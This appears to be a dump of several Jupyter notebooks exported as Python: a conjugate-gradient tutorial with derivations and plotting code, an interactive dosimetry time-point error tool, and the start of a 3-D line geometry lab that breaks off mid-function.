# r_{k+1}r_k &= (b-Ax_{k+1})^T r_k\\
# &= (b-A(x_k+\alpha_k r_k))^T r_k\\
# &= (b-Ax_k)^T r_k - \alpha_k (Ar_k)^T r_k = 0\\
# \Rightarrow \alpha_k (Ar_k)^T r_k &= (b-Ax_k)^T r_k\\
# \alpha_k r_k^T(Ar_k) &= r_k^T r_k\\
# \bbox[#e0f0ff]{\alpha} &= \bbox[#e0f0ff]{\frac{r_k^T r_k}{r_k^T A r_k}} \tag{7}
# \end{align*}$$
#
#
#
# -----------
#
# # Conjugate Gradients
#
# No matter what method do we use, the iterative update of $x$ can be denoted by
#
# $$x_{i+1} = x_i + \alpha_i d_i \tag{8}$$
#
# where $d_i$ is the direction we move and $\alpha_i$ is the distance.
#
# ## n step orthogonal direction method
#
# Let's pick a set of orthogonal search directions as well as take exactly one step that will be just the right length to line up evenly with $x$. Then after $n$ steps, we'll reach the point $x$.
#
# In this idea, it is trivial on picking the search directions because we just need them to be orthogonal to each other. The question is how to determine the step size. Projection may help us with it.
#
# $$a_i = \frac{d_i^T (x-x_0)}{d_i^T d_i} = -\frac{d_i^T e_0}{d_i^T d_i} \tag{9}$$
#
# If we know the projection of the error $e_0$ onto each orthogonal equation, we can go to the target $x$ following these routes. However, this method is too silly, because if we know $e_0$, we can receive $x$ directly.
#
#
#
# ## A-orthogonal
#
# The solution is to make the search directions A-orthogonal instead of orthogonal. Two vectors $d_i$ and $d_j$ are A-orthogonal, or conjugate, if
#
# $$d_i^TAd_j = 0 \tag{10}$$
#
# A-orthogonal derives from the Krylov method we discussed in the previous course.
#
# First of all , we can conclude the Krylov method with the table below.
#
#
# | Descrpition | 1 | 2 | 3 | k-1 | k | k+1 |
# |-------------|---|---|---|-----|---|-----|
# |<img width=200/>|<img width=50/>|<img width=50/>|<img width=50/>|<img width=50/>|<img width=50/>|<img width=50/>|
# |Subspace |$\mathcal{K}_1$|$\mathcal{K}_2$|$\mathcal{K}_3$|$\mathcal{K}_{k-1}$|$\mathcal{K}_k$|$\mathcal{K}_{k+1}$|
# |Add the new vector $A^{j}b$ to expand subspace from $\mathcal{K}_{j}$ to $\mathcal{K}_{j+1}$| $b$ | $Ab$ | $A^2b$ | $A^{k-2}b$ | $A^{k-1}b$ | $A^{k}b$ |
# |Orthonormal version of the additional vector| $q_1$ | $q_2$ | $q_3$ | $q_{k-1}$ | $q_{k}$ | $q_{k+1}$ |
# |Vector $x_j$ is in the subspace $\mathcal{K}_j$| $x_1$| $x_2$| $x_3$| $x_{k-1}$| $x_{k}$| $x_{k+1}$|
# |Direction $d_j\propto x_j-x_{j-1}$ is in the subspace $\mathcal{K}_j$| $d_1$| $d_2$| $d_3$| $d_{k-1}$| $d_{k}$| $d_{k+1}$|
# |Residual $r_j=b-Ax_j$ is in the subspace $\mathcal{K}_{j+1}$| $r_0$| $r_1$| $r_2$| $r_{k-2}$| $r_{k-1}$| $r_{k}$|
#
# The rule for $x_k$ in conjugate gradients is that the residual $r_k = b-Ax_k$ should be orthogonal to all vectors in $\mathcal{K}_k$. Since $r_k$ will be in $\mathcal{K}_{k+1}$, it must be a multiple of Arnoldi's next vector $q_{k+1}$. Each residual is therefore orthogonal to all previous residuals.
#
# $$\left.\begin{array}{ll}
# r_k \perp v,v\in\mathcal{K}_{k}\\
# r_k\in \mathcal{K}_{k+1}\\
# q_{k+1}\text{ is the orthonormal vector of } \mathcal{K}_{k+1}
# \end{array}\right\}\Rightarrow \bbox[#fff0e0]{r_{k} \propto q_{k+1}}
# \Rightarrow r_i^Tr_k = 0\text{ for } i<k \tag{11}$$
#
# The vector $x_i$ is in the subspace $\mathcal{K}_i$, the vector $x_{i-1}$ is in the subspace $\mathcal{K}_{i-1}$. Their difference is therefore in the subspace $\mathcal{K}_{i}$. $r_{k-1}$, $r_{k}$ and their difference $r_{k}-r_{k-1}$ is orthogonal to the subspace $\mathcal{K}_{i}$ for $i<k$.
#
# $$\left.\begin{array}{ll}
# x_i-x_{i-1} \in \mathcal{K}_{i}\\
# r_k-r_{k-1} \perp \mathcal{K}_{i}\\
# \end{array}\right\}\Rightarrow \bbox[#fff0e0]{(x_i-x_{i-1})^T(r_{k}-r_{k-1})=0 \quad \text{ for } i<k} \tag{12}$$
#
# We can transfer the difference of residuals to
#
# $$\bbox[#fff0e0]{r_k-r_{k-1}} = (b-Ax_k)-(b-Ax_{k-1}) = \bbox[#fff0e0]{-A(x_k-x_{k-1})} \tag{13}$$
#
# Substituting this equation into the orthogonal equation, we obtain.
#
# $$(x_i-x_{i-1})^TA(x_k-x_{k-1}) = 0 \quad \text{ for }i<k \tag{14}$$
#
# If we use the notation $d_k$ to denote the direction from $x_{k-1}$ to $x_k$, the orthogonal equation becomes
#
# $$\alpha_i d_i^TA \alpha_k d_k=0 \quad \text{ for }i<k \tag{15}$$
#
# where $\alpha$ is the non-zero weights of these directions. Then we obtain the A-orthogonal or conjugate expression.
#
# $$\bbox[#fff0e0]{d_i^TAd_k=0 \quad \text{ for }i<k} \tag{16}$$
#
# And because $A$ is symmetric, the A-orthogonal expression becomes
#
# $$\left.\begin{array}{ll}
# d_i^TAd_k=0 &\text{ for }i<k\\
# (d_i^T A d_k)^T = d_k^T A d_i =0 &\text{ for } i<k
# \end{array}\right\}
# \Rightarrow \bbox[#fff0e0]{d_i^T A d_k = 0 \quad \text{ for } i\neq k} \tag{17}$$
#
# ## Determine the search directions
#
# From the table above, we find that
# - the direction $d_{i+1}$ is in the subspace $\mathcal{K}_{i+1}$,
# - $r_i$ is in $\mathcal{K}_{i+1}$,
# - $d_1,d_2,\cdots, d_i$ is in the subspace $\mathcal{K}_1,\mathcal{K}_2,\cdots, \mathcal{K}_i$ respectively.
#
# Thus any chosen $d_{i+1}$ can be achieved by the linear combination of $r_{i}$ and $d_1,d_2,\cdots, d_i$.
#
# $$d_{i+1} = r_i + \sum_{k=1}^{i}\beta_{i+1, k}d_k \tag{18}$$
#
# Both sides of the equation multiply by $Ad_j$ in, we obtain
#
# $$\begin{align*}
# d_{i+1}^TAd_j &= r_{i}^TAd_j + \sum_{k=1}^{i}\beta_{i+1, k}d_{k}^TA d_{j}\\
# &= r_i^T \frac{1}{\alpha_j}(r_j-r_{j-1}) + \sum_{k=1}^{i}\beta_{i+1,k}d_{k}^T A d_j\\
# &= \frac{1}{\alpha_j}r_i^T r_j-\frac{1}{\alpha_j}r_i^T r_{j-1} + \sum_{k=1}^{i}\beta_{i+1,k}d_k^T A d_j \tag{19}
# \end{align*}$$
#
# There are 4 conditions
# $$\left.\begin{array}{ll}
# \text{if } &j>i+1 &0 &=0-0+0\\
# \text{if } &j=i+1 &d_{i+1}^TAd_{i+1} &= 0 - \frac{1}{\alpha_{i+1}}r_i^T r_i + 0\\
# \text{if } &j=i &0 &= \frac{1}{\alpha_i}r_i^T r_i - 0 + \beta_{i+1, i}d_{i}^T A d_{i}\\
# \text{if } &j<i &0 &= 0 - 0 + \beta_{i+1, j}d_j^T A d_j
# \end{array}\right\}
# \Rightarrow
# \left\{\begin{array}{ll}
# \beta_{i+1,i} = \frac{r_i^T r_i}{d_i^T A d_i} = \frac{r_i^T r_i}{r_{i-1}^T r_{i-1}}\\
# \beta_{i+1, j} = 0\qquad \forall j<i
# \end{array}\right. \tag{20}$$
#
# where we have used two means to eliminate the zero terms.
# - From the conjugate gradients definition, the residual in different iterations are orthogonal to each other, thus $r_i^T r_j = 0$ for $i\neq j$.
# - The A-orthogonal terms is zero, i.e. $d_i A d_j = 0$ for $i\neq j$.
#
# And the result is inspiring, because when we compute $d_{i+1}$, only the coefficient of $d_i$ is non-zero, there is only one $\beta$ we need to evaluate. As a result, the direction takes the form as follows
#
# $$d_{i+1} = r_{i} + \beta_{i+1} d_{i}\qquad \text{where}\quad \beta_{i+1} = \frac{r_{i}^Tr_{i}}{r_{i-1}^Tr_{i-1}} \tag{21}$$
#
#
# ## Determine the search distances
#
# To prove that this procedure really does compute $x$ in $n$ steps, express the error term as a linear combination of search directions; namely
#
# $$
# e_0 = \sum_{j=1}^{n}\delta_{j}d_j \tag{22}
# $$
#
# The values of $\delta_j$ can be found by a mathematical trick. Because the search directions are derive from Krylov subspaces, they are therefore $A$-orthogonal, it is possible to eliminate all the $\delta_j$ values from Expression 22 by premultiplying the expression by $d_k^TA$
#
# $$\begin{align*}
# d_k^T A e_0 &= \sum_j \delta_jd_k^TAd_j\\
# &=\delta_kd_k^TAd_k \qquad (\text{by A-orthogonality of d vectors})\\
# \Rightarrow \delta_k &=\frac{d_k^TAe_0}{d_k^TAd_k}\\
# &=\frac{d_k^TA(e_0+\sum_{i=1}^{k-1}\alpha_i d_i)}{d_k^TAd_k} \qquad (\text{by A-orthogonality of d vectors})\\
# &=\frac{d_k^TAe_{k-1}}{d_k^TAd_k} \tag{23}
# \end{align*}$$
#
# By Equation (8), we find that $a_i = -\delta_i$. After $n$ iteration,
#
# $$x_n = x_0 + \sum_{j=1}^{n}\alpha_jd_j= x_0 - \sum_{j=1}^{n}\delta_jd_j = x_0-e_0 = x \tag{24}$$
#
# The proof is complete.
#
# And with the definition and achieved results we can write $\alpha$ in a new form
#
# $$\left.\begin{array}{ll}
# r_k = Ae_k\\
# d_k = r_{k-1} + \beta_k d_{k-1}\\
# \alpha_k = -\delta_k = -\frac{d_k^TAe_{k-1}}{d_k^TAd_k}
# \end{array}\right\}\Rightarrow \alpha_k = -\frac{(r_{k-1}+\beta d_{k-1})^T r_{k-1}}{d_{k}^T A d_{k}} = -\frac{r_{k-1}^T r_{k-1}}{d_k^T A d_k} \tag{25}$$
#
# ## Conclusion
#
# The procedure of Conjugate gradient method is as follows
#
# Initially, we should set the start point $x_0 = 0$, the residual $r_0 = b - Ax_0$ and the first search diretion $d_1 = b$. Then we can go through the following procedure to estimate $x$ iteratively.
#
# |Step|Pseudocode|Description| Equation |
# |----|----------|-----------|----------|
# |<img width=30/>|<img width=200/>|<img width=200/>|<img width=30/>|
# |1| $\alpha_k = r_{k-1}^T r_{k-1}/d_{k}^T A d_{k}$ | Step length to next $x_k$ | (25) |
# |2| $x_k = x_{k-1} + \alpha_k d_{k}$ | Approximate solution | (8) |
# |3| $r_k = r_{k-1} - \alpha_k A d_k$ | New residual | (13) |
# |4| $\beta_{k+1} = r_k^T r_k/ r_{k-1}^T r_{k-1}$ | Weight of $d_k$ for next direction | (21) |
# |5| $d_{k+1} = r_k + \beta_{k+1}d_k$ | Next search direction | (21) |
#
#
#
# *More detail such as convergence of these methods can be found in <a href='https://www.cs.cmu.edu/~quake-papers/painless-conjugate-gradient.pdf'>An Introduction to the Conjugate Gradient Method Without the Agonizing Pain</a>*
# +
import matplotlib.pyplot as plt
import numpy as np
A = np.array([[3, 1],
[1, 1]])
b = np.array([3.5, 2])
def conjugate_gradient(A, b, x):
    """Solve the SPD system Ax = b with the conjugate gradient method.

    Parameters
    ----------
    A : (n, n) symmetric positive-definite matrix.
    b : (n,) right-hand side vector.
    x : (n,) starting point.

    Returns
    -------
    The iterates stacked row-wise; the first row is the start point and
    the last row is the solution reached after at most n steps.

    Raises
    ------
    Exception if a search direction has zero curvature (d^T A d == 0),
    which signals a non-SPD matrix.
    """
    r = b - (A@x)
    # Fix: the first search direction must be the initial residual.  The
    # original `d = b` is only equivalent when the start point is zero;
    # with `d = r` the method also converges from arbitrary start points.
    d = r
    route = np.copy(x)
    for i in range(len(b)):
        denominator = d @ A @ d
        numerator = r @ r
        if denominator == 0:
            # Dump the state before failing, to aid debugging.
            print(d)
            print(A)
            print(r)
            print(route)
            raise Exception("conjugate gradient denominator zero")
        alpha = numerator/denominator        # step length, Eq. (25)
        x = x + alpha * d
        rr = r
        r = r - alpha * A @ d                # residual update, Eq. (13)
        # Weight of the previous direction in the next A-orthogonal one, Eq. (21).
        beta = (r @ r)/(rr @ rr)
        d = r + beta * d
        route = np.vstack((route, x))
    return route
def steepest_descent(A, b, x):
    """Solve Ax = b by steepest descent with exact line search.

    Each step moves along the negative gradient (the residual) of the
    quadratic f(x) = 1/2 x^T A x - b^T x, with the step length chosen by
    exact line search.  Returns the iterates stacked row-wise, starting
    with the initial point.
    """
    route = np.copy(x)                  # history of iterates, one row per step
    r = b - A @ x                       # residual = negative gradient
    # Iterate until the residual norm is essentially zero.
    while np.linalg.norm(r) > 1e-8:
        alpha = (r @ r)/(r @ A @ r)     # exact line-search step length, Eq. (7)
        x = x + alpha*r
        r = b - A @ x
        route = np.vstack((route, x))
    return route
def draw_contour(ax):
    """Draw contour lines of f(u) = 1/2 u^T A u - b^T u over [0, 2] x [0, 2].

    Uses the module-level matrix ``A`` and vector ``b``.
    """
    grid_x, grid_y = np.mgrid[0:2:20j, 0:2:20j]
    # One (x, y) column per grid point.
    points = np.vstack((grid_x.reshape(1, -1), grid_y.reshape(1, -1)))
    # Evaluate the quadratic form for every grid point at once.
    values = 1/2 * np.sum(points.T * (A @ points).T, axis=1) - (b @ points)
    ax.contour(grid_x, grid_y, values.reshape(grid_x.shape))
    return
def draw_route(ax, route):
    """Plot the iterate path stored row-wise in ``route`` on axis ``ax``."""
    xs, ys = route.T
    ax.plot(xs, ys)
def main():
    """Compare conjugate gradient and steepest descent on the demo system.

    Draws the contour lines of the quadratic with each method's iterate
    path overlaid: conjugate gradient on the left axis, steepest descent
    on the right.  Uses the module-level ``A`` and ``b``.
    """
    fig = plt.figure(figsize=(11,5), dpi=60)
    ax1 = fig.add_subplot(1,2,1)
    ax2 = fig.add_subplot(1,2,2)
    # Print the reference solution for sanity-checking the plotted paths.
    print(np.linalg.solve(A, b))
    x0 = np.array([0, 0])
    route1 = conjugate_gradient(A, b, x0)
    draw_contour(ax1)
    draw_route(ax1, route1)
    route2 = steepest_descent(A, b, x0)
    draw_contour(ax2)
    draw_route(ax2, route2)
if __name__=="__main__":
    main()
| 14,367 |
/datasets/text-normalization-challenge-english-language/kernels/NULL---schrodingirl---kaggle-go-go-first-attempt.ipynb
|
7d191d6f571791f1b4e9d3155b547ed506df14ac
|
[] |
no_license
|
mindis/GDS
|
https://github.com/mindis/GDS
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,344 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + _cell_guid="36951b37-28bf-48dd-b176-49028333fa75" _uuid="06d4a7301c478f7237c9386507e5eb3319d914c0"
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
print(check_output(["ls", "../input"]).decode("utf8"))
# Any results you write to the current directory are saved as output.
# The notebook contains only one cell. Run it.
#
# Follow the instructions on the interactive window, in short:
#
# 1 Select the time points to be included in the calculation.
# 2 Select up to six paralel time series
# 3 Click "Draw map"
#
# TODO: Revert the function so tiles gets de-selected also
# TODO: General aethetics
# +
# %matplotlib
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#import scipy.io
#from itertools import product
from matplotlib.patches import RegularPolygon
import seaborn as sns
from matplotlib.ticker import FuncFormatter
from scipy.optimize import curve_fit
def integrate_box_and_tail(t_series, a_series):
    """Area under an activity curve from t = 0 to infinity.

    Built from three pieces: a rectangle from t = 0 to the first sample,
    trapezoids over the interior sampling intervals, and an analytic
    exponential tail anchored at the last two samples.
    """
    # Rectangle: first activity value held constant from t = 0 to t_series[0].
    rect = t_series[0]*a_series[0]
    # Trapezoids up to the second-to-last sample; the final interval is
    # absorbed into the exponential tail below.
    trap = 0
    for k in range(0, len(a_series)-2):
        trap = trap + ((a_series[k] + a_series[k + 1])/2)*(t_series[k+1]-t_series[k])
    area = rect + trap
    # Two-point exponential 'fit': the integral of a[-2]*exp(lam*(t - t[-2]))
    # from t[-2] to infinity is -a[-2]/lam (lam < 0 for a decaying curve).
    lam = (np.log(a_series[-1])-np.log(a_series[-2]))/(t_series[-1]-t_series[-2])
    tail = a_series[-2]/lam*-1
    return area + tail
def return_diff_full_and_reduced(t_series, a_series, red_log_vector, is_wb = False):
    """Relative change of the time-activity integral when time points are cut.

    Parameters
    ----------
    t_series, a_series : sample times and activity values.
    red_log_vector : 0/1 vector; time points flagged 0 are removed.
    is_wb : if True, integrate via a mono-exponential curve fit (whole-body
        style) instead of the box-and-tail trapezoid scheme.

    Returns
    -------
    The signed relative error (I_reduced - I_full) / I_full, or None when
    fewer than three points remain after the cut.
    """
    I_full = integrate_box_and_tail(t_series, a_series)
    index_delete = np.where(red_log_vector == 0)[0]
    t_red = np.delete(t_series, index_delete)
    a_red = np.delete(a_series, index_delete)
    if len(a_red) < 3 or len(t_red) < 3:
        # Too few samples left to fit or integrate sensibly.
        # Fix: Python 2 `print` statement converted to the print() function.
        print("Warning - series is too short, default to none")
        return None
    if is_wb:
        if sum(red_log_vector) == 2 or sum(red_log_vector) == 3:
            # Short series: give curve_fit a decay-like starting guess so
            # the exponential fit converges.
            initial = np.array([1000,-0.001])
            popt_red, pcov_red = curve_fit(exp_func, t_red, a_red, p0 = initial)
        else:
            popt_red, pcov_red = curve_fit(exp_func, t_red, a_red)
        popt, pcov = curve_fit(exp_func, t_series, a_series)
        # Analytic integral of a*exp(-b*t) over [0, inf) is a/b.
        # NOTE(review): uses a_series[0] rather than the fitted amplitude
        # popt[0] as the numerator — confirm this is intended.
        I_full = a_series[0]/popt[1]
        I_red = a_series[0]/popt_red[1]
        diff = (I_red-I_full)/I_full
    else:
        I_red = integrate_box_and_tail(t_red, a_red)
        diff = (I_red-I_full)/I_full
    return diff
def return_cut_string(glob_string, red_log_vector):
    """Drop every entry of ``glob_string`` whose flag in ``red_log_vector`` is 0."""
    drop_idx = np.where(red_log_vector == 0)[0]
    return np.delete(glob_string, drop_idx)
def load_arm1_data(file_name):
    """Load the pickled curve data and keep only the first four rows (arm 1)."""
    return pd.read_pickle(file_name)[0:4]
def exp_func(x, a, b):
    """Decaying exponential a * exp(-b * x); model function for curve_fit."""
    return np.exp(-b*x) * a
def find_largest_error(data, organ, log_array):
    """Largest-magnitude relative error over the four patients for one organ.

    ``log_array`` flags which time points are kept.  Whole-body ('WB')
    series are integrated with the exponential-fit variant; all other
    organs use the box-and-tail scheme.  Returns the signed error with
    the greatest absolute value.
    """
    use_wb_fit = (organ == 'WB')
    errors = np.ones(4)
    for patient in range(4):
        errors[patient] = return_diff_full_and_reduced(
            data['Time'][patient], data[organ][patient], log_array, is_wb=use_wb_fit)
    # Pick the extremum (min or max) with the larger magnitude, keeping its sign.
    return max(np.min(errors), np.max(errors), key=abs)
def construct_error_matrix(data, cut_matrix):
    """Largest per-organ error (in percent) for each of six candidate cuts.

    Rows correspond to the six cut vectors in ``cut_matrix``; columns to
    the organs Liver, Spleen, Kidney and WB.
    """
    organ_names = ['Liver', 'Spleen', 'Kidney', 'WB']
    errors = np.zeros([6, 4])
    for col, organ in enumerate(organ_names):
        for row in range(6):
            errors[row, col] = find_largest_error(data, organ, cut_matrix[row, :])
    return errors * 100  # fractional error -> percent
def render_heatmap(error_matrix, cut_matrix = 0):
    """Render the percent-error matrix as an annotated seaborn heatmap.

    Rows are labelled with the retained time points from ``cut_matrix``
    and columns with the organ names; cell annotations are clipped at
    +/-10%.  Returns the created matplotlib figure.
    """
    annotations = error_matrix_to_annot(error_matrix)
    row_labels = cut_points_string_from_matrix(cut_matrix)
    col_labels = ['Liver', 'Spleen', 'Kidney', 'WB']
    fig = plt.figure()
    axis = sns.heatmap(error_matrix,
                       annot=annotations,
                       fmt='',
                       cbar = False,
                       square=True,
                       vmax = 10,
                       vmin = -10,
                       yticklabels = row_labels,
                       xticklabels = col_labels,
                       )
    # Keep the time-point labels horizontal for readability.
    axis.set_yticklabels(axis.get_yticklabels(), rotation = 0)
    return fig
def error_matrix_to_annot(error_matrix):
    """Format an error matrix (values in percent) as annotation strings.

    Entries beyond +/-10 are displayed as '>10%'.
    NOTE(review): both signs collapse to the same '>10%' label (the
    original clipped negative overflow to +10 as well), i.e. the label
    reports magnitude only — confirm this rendering is intended.

    Fix: works on a copy, so the caller's matrix is no longer mutated
    in place (the original clipped ``error_matrix`` itself).
    """
    clipped = np.array(error_matrix, dtype=float, copy=True)
    clipped[clipped > 10] = 10
    clipped[clipped < -10] = 10
    # Format each entry as a one-decimal percentage, e.g. 5.0 -> '5.0%'
    # (the values are divided by 100 first because '{:.1%}' multiplies by 100).
    string_arr = np.array(
        [['{:.1%}'.format(v) for v in row] for row in clipped / 100],
        dtype=object)
    string_arr[string_arr == '10.0%'] = '>10%'
    return string_arr
def cut_points_string_from_matrix(cut_matrix):
    """Build one y-axis label per cut vector, listing the retained time points.

    Assumes six cut vectors over the six global time points
    2, 4, 8, 24, 96 and 168 hours.
    """
    glob_time = np.array(['2,', '4,', '8,', '24,', '96,', '168 '])
    time_cuts = []
    for row in range(6):
        # Fix: index with the boolean mask directly.  The original wrapped
        # the mask in a list (`glob_time[[mask]]`), a pattern deprecated in
        # NumPy 1.15 and removed in modern releases.
        kept = glob_time[cut_matrix[row, :] == 1]
        # str() of the array gives e.g. "['2,' '8,']"; strip the quotes.
        time_cuts.append(str(kept).replace("'", ""))
    return time_cuts
def on_click(event):
    """Mouse-click handler for the interactive tile map.

    Clicking the 'Draw map' polygon computes and renders the error
    heatmap; clicking the restart polygon clears the figure; clicking a
    tile marks the corresponding time point as selected (tiles cannot be
    de-selected yet — see module TODO).

    Relies on module-level state: ``polygon_draw``, ``polygon_restart``,
    ``polygons``, ``poly_inds``, ``logical_back``, ``data`` and ``fig``.

    Fix: Python 2 ``print`` statements converted to the print() function.
    """
    if polygon_draw.contains_point((event.x, event.y)):
        # logical_back rows are stored bottom-up relative to the cut matrix.
        cut_matrix = np.flipud(logical_back) # TODO: Strange...
        error_matrix = construct_error_matrix(data, cut_matrix)
        print(error_matrix)
        render_heatmap(error_matrix, cut_matrix)
    if polygon_restart.contains_point((event.x, event.y)):
        print("Restarting...")
        plt.clf()
    for i in range(0, 36): # TODO: Remove magic number (6x6 tile grid)...
        curr_pol = polygons[i]
        if curr_pol.contains_point((event.x, event.y)):
            # Highlight the clicked tile and record the selection.
            curr_pol.set_facecolor('#404040')
            curr_pol_ind = poly_inds[i]
            logical_back[curr_pol_ind[1], curr_pol_ind[0]] = 1
            fig.canvas.draw()
# ---------------------------------------------------------------------------
# Study data: four patients, six measurement time points each.
# ---------------------------------------------------------------------------
# Patient identifiers.
P_num = ['P1', 'P2', 'P3', 'P5']
# Injected activity per patient (units not stated here -- note it equals the
# first whole-body value below; TODO confirm units against the source data).
Inj_act = [1102, 1036, 746, 1982]
# Actual measurement times per patient, apparently in hours post-injection
# (nominal schedule 2, 4, 8, 24, 96, 168 h -- cf. the grid labels below).
Time = [np.array([2.5, 4.29999, 8.23334, 19.7833, 94.2, 168.1]),
        np.array([2.75, 4.25, 8.2, 20.65, 100.583, 189.733]),
        np.array([2.5, 4.23334, 8.09998, 20.2833, 98.7, 171.317]),
        np.array([2.25, 3.99998, 7.63332, 20.4667, 98.2833, 170.25])]
# Per-organ activity at each time point, one array per patient.
Liver = [np.array([108.770512, 112.38991897, 116.31435356, 104.30149178, 63.3970276, 34.28450106]),
         np.array([107.33164239, 110.76314063, 111.41093599, 107.82613686, 80.06103286, 41.37089202]),
         np.array([63.47309292, 63.66233913, 58.74609277, 57.19409426, 49.70220657, 29.98779343]),
         np.array([199.88476722, 201.98137149, 209.83657957, 212.59886244, 154.76056338, 87.77230047])]
Spleen = [np.array([34.11104195, 34.96826027, 42.38488655, 50.65711356, 39.5992569, 20.78874735]),
          np.array([28.63080662, 27.76166367, 30.34939042, 32.8279405, 28.99061033, 15.96244131]),
          np.array([6.89295301, 6.1512036, 4.40919565, 8.94284371, 9.30892019, 6.91267606]),
          np.array([24.08050666, 41.05687556, 31.69589562, 45.60926242, 43.58920188, 32.15492958])]
Kidney = [np.array([6.83737549, 6.34075983, 6.22321691, 6.25137427, 2.75423567, 1.3093482]),
          np.array([5.01502796, 5.04874878, 4.83993533, 5.1855283, 2.75384977, 1.21965399]),
          np.array([4.59038279, 4.53452984, 4.50516336, 4.61176031, 2.73732394, 1.67199202]),
          np.array([13.88433109, 13.81154029, 14.20934367, 14.36329703, 7.38638498, 3.44148545])]
# Whole-body activity; the first entry matches the injected activity.
WB = [np.array([1102.0, 1080.134096, 1048.26459865, 976.87715549, 449.40147401, 223.14593731]),
      np.array([1036.0, 1013.16240137, 976.59289097, 902.0819552, 517.39699551, 202.29620158]),
      np.array([746.0, 728.09661667, 706.99680365, 656.26798142, 385.87161274, 198.94434538]),
      np.array([1982.0, 1945.99382361, 1899.50546373, 1752.1932018, 979.75787886, 505.23959224])]
# Assemble into one DataFrame: one row per patient, one column per quantity.
d = {'P_num': P_num,
     'Inj_act': Inj_act,
     'Time': Time,
     'Liver':Liver,
     'Spleen': Spleen,
     'Kidney': Kidney,
     'WB': WB}
df = pd.DataFrame(data = d)
#
#
# End of data definition
#
#
# TODO: Documentation
# ---------------------------------------------------------------------------
# Interactive figure: a 6x6 grid of clickable squares. Rows correspond to the
# six candidate cuts and columns to the six measurement time points; clicking
# a square selects that time point (state kept in `logical_back`, consumed by
# the `on_click` callback).
# ---------------------------------------------------------------------------
data = df
size_factor_x = 20
size_factor_y = 20
num_row = 6
num_cols = 6
# Selection state: logical_back[row, col] == 1 once that square is clicked.
logical_back = np.zeros([num_row, num_cols])
fig = plt.figure(figsize = ((size_factor_y + 2) / 4., (size_factor_x + 2) / 3.))
# Frameless, equal-aspect axes used purely as a drawing canvas.
ax = fig.add_axes((0.05, 0.05, 0.9, 0.9), aspect = 'equal', frameon = False,
                  xlim = (-0.05, size_factor_y + 0.05),
                  ylim = (-0.05, size_factor_x + 0.05))
# Hide tick labels on both axes.
for axies in (ax.xaxis, ax.yaxis):
    axies.set_major_formatter(plt.NullFormatter())
    axies.set_major_formatter(plt.NullFormatter())
# Two button patches: dark grey "Draw map" renders the heatmap; the red one
# clears the figure (NOTE(review): labelled "Quit" below but it actually
# restarts -- see on_click; confirm intended behaviour).
polygon_draw = plt.Polygon([[15,7], [15,11], [17,11], [17,7],[15,7]], closed = True, fc = '#202020')
polygon_restart = plt.Polygon([[15,7+6], [15,11+6], [17,11+6], [17,7+6],[15,7+6]], closed = True, fc = '#902020')
polygon_draw.set_picker(True)
ax.add_patch(polygon_draw)
ax.add_patch(polygon_restart)
# Grid layout: (x_0, y_0) is the lower-left corner of the next square,
# L the square side length, S the stride between squares.
x_0 = 2
y_0 = 7
L = 2
S = 2
x_ind = 0
y_ind = 0
polygons = []   # square patches, in creation order
poly_inds = []  # (column, row) grid index of each patch, parallel to polygons
glob_time = ['2 h', '4 h', '8 h', '24 h', '96 h', '168 h']
# Build the grid column by column, bottom to top within each column.
for i in range(0,num_cols):
    for j in range(0, num_row):
        polygon_1 = plt.Polygon([[x_0, y_0],
                                 [x_0,y_0 + L],
                                 [x_0 + L,y_0 + L],
                                 [x_0 + L,y_0],
                                 [x_0,y_0]],
                                fc = 'white',
                                ec = 'black')
        y_0 = y_0 + S
        ax.add_patch(polygon_1)
        polygons.append(polygon_1)
        poly_ind = (x_ind, y_ind)
        poly_inds.append(poly_ind)
        y_ind = y_ind + 1
    x_ind = x_ind + 1
    y_0 = 7
    y_ind = 0
    x_0 = x_0 + S
# Column headers with the time labels above the grid.
text_hrs_space = 1.8
for num_time in range(0, len(glob_time)):
    ax.text(2.7 + num_time*text_hrs_space,num_row*3.2 + 0.2, glob_time[num_time])
ax.text(17.5,8.5,"Draw map")
ax.text(17.5,14.5, "Quit")
ax.text(2, 2, " Simulate a calculation with a reduced \n number of time points \n\n Select time points by clicking the squares\n\n Show result by clicking \"Draw map\" ")
# Wire the click handler; keep the connection id so it is not garbage-collected.
foo = fig.canvas.mpl_connect('button_press_event', on_click)
| 11,649 |
/H.Geo+5.Hafta+Çarşamba+Lab.ipynb
|
a8f5cb0bf9023fd2223c7aeb4c2498586e8623c0
|
[] |
no_license
|
nefisebanu/Hesaplamali-Geometri
|
https://github.com/nefisebanu/Hesaplamali-Geometri
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 106,289 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
def draw_my_line(normal_vector, point_on_line):
    """Sample 11 points along a 3-D line for plotting.

    The line passes through ``point_on_line`` with direction
    ``normal_vector``; points are taken at parameter values t = -1..9.

    Returns a tuple ``(xs, ys, zs)`` of coordinate lists.
    """
    dx, dy, dz = normal_vector[0], normal_vector[1], normal_vector[2]
    px, py, pz = point_on_line[0], point_on_line[1], point_on_line[2]
    ts = range(-1, 10)
    xs = [px + t * dx for t in ts]
    ys = [py + t * dy for t in ts]
    zs = [pz + t * dz for t in ts]
    return (xs, ys, zs)
def my_scalar_product(a, b):
    """Return the scalar (dot) product a^T b of two 3-vectors."""
    return a[0] * b[0] + a[1] * b[1] + a[2] * b[2]
def point_on_line(normal_vector, point_on_line, other_point):
    """Return the point on a 3-D line nearest to ``other_point``.

    The line is defined by direction ``normal_vector`` and a point
    ``point_on_line`` lying on it. The result is the orthogonal projection
    of ``other_point`` onto the line.
    """
    # Vector from the anchor point on the line to the query point.
    b = [other_point[0] - point_on_line[0],
         other_point[1] - point_on_line[1],
         other_point[2] - point_on_line[2]]
    a = normal_vector
    # Projection coefficient c = (a.b)/(a.a); float() guards against
